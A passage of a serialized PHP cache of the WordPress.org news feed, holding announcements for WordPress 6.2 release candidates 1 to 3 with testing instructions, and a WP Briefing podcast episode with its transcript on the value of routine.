download the <a href=\"https://wordpress.org/wordpress-6.2-RC3.zip\">RC3 version (zip)</a>.</p>\n\n\n\n<p><strong>Option 3</strong>: Use the following WP-CLI command:</p>\n\n\n\n<p><code>wp core update --version=6.2-RC3</code></p>\n\n\n\n<h2 class=\"wp-block-heading\">A shout out to plugin and theme developers</h2>\n\n\n\n<p>Your products are the reason WordPress does so many things for more people across the world. As you test your latest versions against RC3, make sure you update the “<em>Tested up to”</em> version in your plugin’s readme file to 6.2. If you find compatibility problems, please post detailed information to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>.</p>\n\n\n\n<p>Check out the <a href=\"https://make.wordpress.org/core/2023/03/09/wordpress-6-2-field-guide/\">WordPress 6.2 Field Guide</a> for more details about the major changes in this release.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Help translate WordPress</h2>\n\n\n\n<p>Do you speak a language other than English? <a href=\"https://translate.wordpress.org/projects/wp/dev\">Help translate WordPress into more than 100 languages.</a>&nbsp;</p>\n\n\n\n<h2 class=\"wp-block-heading\">Keep WordPress bug-free—help with testing</h2>\n\n\n\n<p>Without your testing support, hitting important product milestones would be a much bigger challenge. It’s also a meaningful way to contribute to the project. If you’re new to testing, or it’s been a while, <a href=\"https://make.wordpress.org/test/2023/02/07/help-test-wordpress-6-2/\">this detailed guide</a> can help you get started.&nbsp;</p>\n\n\n\n<p>If you think you have run into an issue, please report it to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. If you are comfortable writing a reproducible bug report, you can <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. You can also check your issue against a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Release the haiku</h2>\n\n\n\n<p>Wow, we’re oh so close<br>Test, test. Get it out the door.<br>Please no RC 4.</p>\n\n\n\n<p class=\"has-text-align-right\"><em>Thank you to the following contributors for collaborating on this post: <a href=\'https://profiles.wordpress.org/laurlittle/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>laurlittle</a> <a href=\'https://profiles.wordpress.org/marybaum/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>marybaum</a> <a href=\'https://profiles.wordpress.org/audrasjb/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>audrasjb</a> <a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a> <a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a></em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"14685\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 6.2 Release Candidate 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2023/03/wordpress-6-2-release-candidate-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 14 Mar 2023 17:59:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:3:\"6.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=14640\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:315:\"WordPress 6.2 Release Candidate 2 is now available for download and testing.\nThis version of the WordPress software is under development. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test RC2 on a test server and site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Jonathan Pantani\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4681:\"\n<p>Here it is: the second release candidate (RC2) for WordPress 6.2 is ready! </p>\n\n\n\n<p>WordPress 6.2 is scheduled for release on March 28, 2023—which is only two weeks away. Now is your perfect opportunity if you haven’t tried it out yet. Your feedback and help filing bug reports are what keep the WordPress experience stable, smooth, and delightful. It’s important work and a great way to contribute to the project.&nbsp;</p>\n\n\n\n<p>Thanks to everyone who tested the Beta and RC releases so far. Since RC1 was released on March 9, there have been about 36 issues resolved in <a href=\"https://core.trac.wordpress.org/query?status=accepted&amp;status=closed&amp;changetime=03%2F07%2F2023..03%2F13%2F2023&amp;milestone=6.2&amp;col=id&amp;col=summary&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=priority&amp;order=id\">Trac</a> and <a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.2\">GitHub</a>.&nbsp;</p>\n\n\n\n<p>Catch up on the featured highlights, and dig into more 6.2 details, in the <a href=\"https://wordpress.org/news/2023/03/wordpress-6-2-release-candidate-1/\">WordPress 6.2 RC1 release announcement</a>.</p>\n\n\n\n<h2 class=\"wp-block-heading\">How to install RC2 for testing</h2>\n\n\n\n<p><strong>This version of the WordPress software is under development. </strong>Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test RC2 on a test server and site.&nbsp;</p>\n\n\n\n<p>You can test WordPress 6.2 RC2 in three ways:</p>\n\n\n\n<p><strong>Option 1</strong>: Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the “Bleeding edge” channel and “Beta/RC Only” stream).</p>\n\n\n\n<p><strong>Option 2</strong>: Direct download the <a href=\"https://wordpress.org/wordpress-6.2-RC2.zip\">RC2 version (zip)</a>.</p>\n\n\n\n<p><strong>Option 3</strong>: Use the following WP-CLI command:</p>\n\n\n\n<p><code>wp core update --version=6.2-RC2</code></p>\n\n\n\n<h2 class=\"wp-block-heading\">A shoutout to plugin and theme developers</h2>\n\n\n\n<p>Your products are the reason WordPress does so many more things for more people across the world. As you test your latest versions against RC2, make sure you update the “<em>Tested up to”</em> version in your plugin’s readme file to 6.2. If you find compatibility problems, please post detailed information to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>.</p>\n\n\n\n<p>Check out the <a href=\"https://make.wordpress.org/core/2023/03/09/wordpress-6-2-field-guide/\">WordPress 6.2 Field Guide</a> for more details about the major changes in this release.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Help translate WordPress</h2>\n\n\n\n<p>Do you speak a language other than English? <a href=\"https://translate.wordpress.org/projects/wp/dev\">Help translate WordPress into more than 100 languages.</a>&nbsp;</p>\n\n\n\n<h2 class=\"wp-block-heading\">Join the bug hunt—test, test, test</h2>\n\n\n\n<p>Without your testing support, hitting important product milestones would be a much bigger challenge. It’s also a meaningful way to contribute to the project. If you’re new to testing, or it’s been a while, <a href=\"https://make.wordpress.org/test/2023/02/07/help-test-wordpress-6-2/\">this detailed guide</a> can help you get started.&nbsp;</p>\n\n\n\n<p>If you think you have run into an issue, please report it to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. If you are comfortable writing a reproducible bug report, you can <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. You can also check your issue against a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Release the haiku</h2>\n\n\n\n<p>Listen, we are close<br>One step to final RC<br>Breathe, and keep going</p>\n\n\n\n<p><em>Thank you to the following contributors for collaborating on this post: <a href=\'https://profiles.wordpress.org/laurlittle/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>laurlittle</a> <a href=\'https://profiles.wordpress.org/marybaum/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>marybaum</a> <a href=\'https://profiles.wordpress.org/audrasjb/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>audrasjb</a> <a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a></em></p>\n\n\n\n<p><em>Haiku by <a href=\'https://profiles.wordpress.org/sereedmedia/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>sereedmedia</a></em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"14640\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"WP Briefing: Episode 51: Is Routine a Rut?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wordpress.org/news/2023/03/episode-51-is-routine-a-rut/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 13 Mar 2023 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=14621\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"Join Josepha as she discussed the benefits of routine and what role it plays in the WordPress project. \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2023/03/WP-Briefing-051.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:9299:\"\n<p>On Episode fifty-one of the WordPress Briefing podcast, join WordPress Executive Director Josepha Haden Chomphosy as she makes a case for why routine is a good thing&#8211; in life and in the WordPress project. </p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2 class=\"wp-block-heading\">Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/javiarce/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/javiarce/\">Javier Arce</a><br>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a><br>Song: Fearless First by Kevin MacLeod </p>\n\n\n\n<h2 class=\"wp-block-heading\">Show Notes</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/06/wordpress-6-2-rc1-postponed-additional-beta-5-added/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/core/2023/03/06/wordpress-6-2-rc1-postponed-additional-beta-5-added/\">Beta 5, Additional Beta Released</a></li>\n\n\n\n<li><a href=\"https://wordpress.org/news/2023/03/wordpress-6-2-release-candidate-1/\">WordPress 6.2, Release Candidate 1</a></li>\n\n\n\n<li><a href=\"https://wp20.wordpress.net/wp20-celebrations/\" data-type=\"URL\" data-id=\"https://wp20.wordpress.net/wp20-celebrations/\">Join WordPress 20th Anniversary Celebrations</a></li>\n\n\n\n<li><a href=\"https://www.eventbrite.com/e/organizing-diverse-inclusive-wordpress-events-ameremea-tickets-561034247537\" data-type=\"URL\" data-id=\"https://www.eventbrite.com/e/organizing-diverse-inclusive-wordpress-events-ameremea-tickets-561034247537\">Organizing Diverse and Inclusive WordPress Events</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/community/2023/02/27/proposal-modify-the-events-and-news-widget-to-show-topic-based-meetups-worldwide/\">Events News Widget Modification Proposal</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">Transcript</h2>\n\n\n\n<span id=\"more-14621\"></span>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:00]&nbsp;</p>\n\n\n\n<p>Hello everyone, and welcome to the WordPress Briefing, the podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks.</p>\n\n\n\n<p>I&#8217;m your host, Josepha Haden Chomphosy. Here we go.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:29]</p>\n\n\n\n<p>All right, my WordPress wonders; it&#8217;s time to join me for one of my gentle rants on basic leadership principles. Today we&#8217;re talking about the importance of routine and predictability in everyday life. But don&#8217;t worry, I&#8217;m gonna tie it all together with WordPress, too. So by now you&#8217;re probably aware that I don&#8217;t really consider myself one of those “born leaders.”&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:01:00]&nbsp;</p>\n\n\n\n<p>Over the years, I&#8217;ve put a lot of effort into researching characteristics of good leaders and general leadership methods overall. But one of the things I encountered early on in my leadership learning journey was the concept of routine.</p>\n\n\n\n<p>As with most leadership practices I hold, routine has more than one purpose. From a very pragmatic standpoint, routines provide predictability and the more predictable something is, the lower the cognitive load becomes, which in turn lets you use your thinking power for something better. For instance, if you know that in every check-in with your team lead, she&#8217;s gonna ask you what you were proud to have shipped last week, what you want to ship next week, and what things stand in the way of your plans, then you know that that is what you have to prepare for.&nbsp;</p>\n\n\n\n<p>The knowledge work, the thinking part. The thinking part stops being, what is my team lead going to ask me and starts being what is the problem that she can help me solve?&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:02:00]&nbsp;</p>\n\n\n\n<p>But from a more human standpoint, that kind of predictability helps us to understand when something that happened is out of the ordinary. Whether it&#8217;s a notification of a comment left on your blog or syntactical highlighting that lets you know that you&#8217;ve written something that&#8217;s out of voice or against grammar standards, it just lets you know that something is unusual there and deserves your attention.&nbsp;</p>\n\n\n\n<p>Now for me, this has a lot of applications across the WordPress project. There are the obvious things like the cadence of our major release cycles or our notification system, which honestly could use a bit of TLC, a little bit of elbow grease.</p>\n\n\n\n<p>But there are also less obvious things that this idea still applies to simply because of the way our brains work, the information architecture on our sites, for instance. It should make sense visually and semantically because that makes it easy for us to skim and predict where the highest value content is for us. Or the user interface across the back end of our software.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:03:00]&nbsp;</p>\n\n\n\n<p>Having familiar tasks or actions across any type of content or area of content makes it easier for a site maintainer to flow from one area of a site to the next, fixing things as they find them without necessarily having to stop and put down their hammer and pick up a screwdriver or whatever metaphor works for you. Or if you&#8217;re doing more nuanced work, like put down your timpani mallets and pick up your xylophone mallets.&nbsp;</p>\n\n\n\n<p>So, yeah, consistency. Consistency is the topic of today&#8217;s gentle rant. I get really worked up about it because I feel like consistency ends up being this euphemism for being boring. But I honestly believe that it&#8217;s the consistency and the dependability that make it clear what is supposed to be exciting, the things that are different enough that they merit our attention.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:03:38]&nbsp;</p>\n\n\n\n<p>Which, fortunately, now brings us to our small list of big things. It&#8217;s actually a pretty big list today and also a bunch of pretty big things. So first thing to know, there was an additional beta added to this release cycle.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:04:00]&nbsp;</p>\n\n\n\n<p>It was beta five; it came out last week, I think. There was a bit of a regression that we worked our way through. And so RC1, release candidate one, is going to be postponed a little bit because of that. But don&#8217;t wait until RC to start testing, obviously RC is tomorrow, so that means you get to test, like, today!</p>\n\n\n\n<p>The second thing on our small list of big things is that we have the WordPress 20th anniversary coming up. That&#8217;s May 27th. And you can join in the celebrations. So at WordPress&#8217;s 10th anniversary and 15th anniversary, we had like a big, ongoing global set of parties, like Meetup events got together and made cakes, or did a concert, or did a hackathon for various reasons.</p>\n\n\n\n<p>Like they all got together on May 27th or thereabouts and did some really fun, like celebration of how far WordPress has gotten them and how far they hope to be able to go with WordPress.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:05:00]&nbsp;</p>\n\n\n\n<p>So if you are from the before times WordCamp kind of organizing timeframe, you know that we always consider WordCamps to be like an annual celebration of the excellence of your community and how much you all come together and how different you are as part of this overall big WordPress-y thingy.&nbsp;</p>\n\n\n\n<p>All right. Third item that we have is that, I know that I mentioned this in the last WP Briefing as well, but we have another session of the diverse and inclusive WordPress events coming up that&#8217;s happening on March 16th. So coming up really fast, we&#8217;ll put a link to that in the show notes as well.</p>\n\n\n\n<p>And the final thing, I don&#8217;t remember what list number we&#8217;re at, but the final thing is that there is a proposal out there right now to modify the events and news widget that we use inside the WordPress dashboard. If you&#8217;re not familiar with it, it is a place where all of the local-to-you Meetup events get listed.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:06:00]&nbsp;</p>\n\n\n\n<p>It&#8217;s where all of the news items from various WordPress media outlets get published. We just have a link to it there. And so, we would like to make some changes to that so that we&#8217;re able to include not only specific location types of events but also events that are location agnostic because they&#8217;re online but might have a specific, identifying niche that you particularly find interesting.</p>\n\n\n\n<p>So it might be for Spanish speakers or for women in particular, or whatever it might be. There&#8217;s a proposal out for that. We&#8217;ll put a link to that in the show notes as well.&nbsp;</p>\n\n\n\n<p>And that, my friends, is your small list of big things. Thanks for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.&nbsp;</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"14621\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 6.2 Release Candidate 1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2023/03/wordpress-6-2-release-candidate-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 09 Mar 2023 17:39:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"6.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=14619\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:316:\"WordPress 6.2 Release Candidate 1 is now available for download and testing.\nThis version of the WordPress software is under development. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test RC 1 on a test server and site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"marybaum\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:10157:\"\n<p>WordPress 6.2’s first release candidate (RC1) is here and ready for testing.</p>\n\n\n\n<p>Reaching this part of the release cycle is a key milestone. While we consider release candidates ready for final release, additional testing and use by the community can only make it better.</p>\n\n\n\n<p>The official release of 6.2 is just three short weeks away on March 28. In open source, we say with <a href=\"https://en.wiktionary.org/wiki/given_enough_eyeballs,_all_bugs_are_shallow\">many eyes, all bugs are shallow</a>, so we ask everyone across the WordPress ecosystem—theme and plugin developers, educators, agencies, and creators—<a href=\"https://make.wordpress.org/test/2023/02/07/help-test-wordpress-6-2/\">to jump in and help test</a>.</p>\n\n\n\n<p><strong>This version of the WordPress software is under development. </strong>Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test RC1 on a test server and site.&nbsp;</p>\n\n\n\n<p>You can test WordPress 6.2 RC1 in three ways:</p>\n\n\n\n<p><strong>Option 1</strong>: Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the “Bleeding edge” channel and “Beta/RC Only” stream).</p>\n\n\n\n<p><strong>Option 2</strong>: Direct download the <a href=\"https://wordpress.org/wordpress-6.2-RC1.zip\">RC1 version (zip)</a>.</p>\n\n\n\n<p><strong>Option 3</strong>: Use the following WP-CLI command:</p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">wp core update --version=6.2-RC1</code></pre>\n\n\n\n<p><em>First-time tester? <a href=\"https://make.wordpress.org/test/handbook/get-setup-for-testing/\">Here&#8217;s a guide to getting started</a>.</em> </p>\n\n\n\n<h2 class=\"wp-block-heading\">What’s in WordPress 6.2 RC1</h2>\n\n\n\n<p>This release includes over 900 enhancements and fixes and is the first major release of 2023.&nbsp;</p>\n\n\n\n<ul>\n<li><a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.2\">Gutenberg commits on GitHub</a></li>\n\n\n\n<li><a href=\"https://core.trac.wordpress.org/query?status=accepted&amp;status=closed&amp;changetime=2023-02-21..2023-03-01&amp;milestone=6.2&amp;col=id&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=priority&amp;order=id\">Core Trac Tickets</a></li>\n</ul>\n\n\n\n<p>WordPress 6.2 comes packed with enhancements to make everything you do smoother, faster and a little more inspired:</p>\n\n\n\n<ul>\n<li>A refreshed Site Editor for easier template browsing</li>\n\n\n\n<li>A new sidebar experience in the Navigation block for simpler menu management</li>\n\n\n\n<li>Reorganized block settings with separate tabs for Settings and Styles</li>\n\n\n\n<li>New inserter design that lets you add Media—including Openverse and its more than 600-million-item catalog, plus your entire Media Library—and better categories</li>\n\n\n\n<li>More header and footer patterns for block themes</li>\n\n\n\n<li>A new Style Book that shows your entire site’s look and feel all in one place</li>\n\n\n\n<li>New controls to let you copy and paste block styles for faster, simpler design across your whole site</li>\n\n\n\n<li>Custom CSS you can add for those finishing touches, per block and globally</li>\n\n\n\n<li>Sticky positioning to keep important blocks fixed when scrolling</li>\n\n\n\n<li>Distraction Free mode for moments you want to focus on writing</li>\n\n\n\n<li>New options that let you import certain widgets from classic to block themes</li>\n\n\n\n<li>The removal of the Site Editor’s beta label—welcome to the next generation of WordPress</li>\n</ul>\n\n\n\n<p><em>Want to see some of these featured highlights in action? Check out the <a href=\"https://wordpress.org/news/2023/03/your-wordpress-6-2-preview/\">WordPress 6.2 Demo</a> recorded March 2, 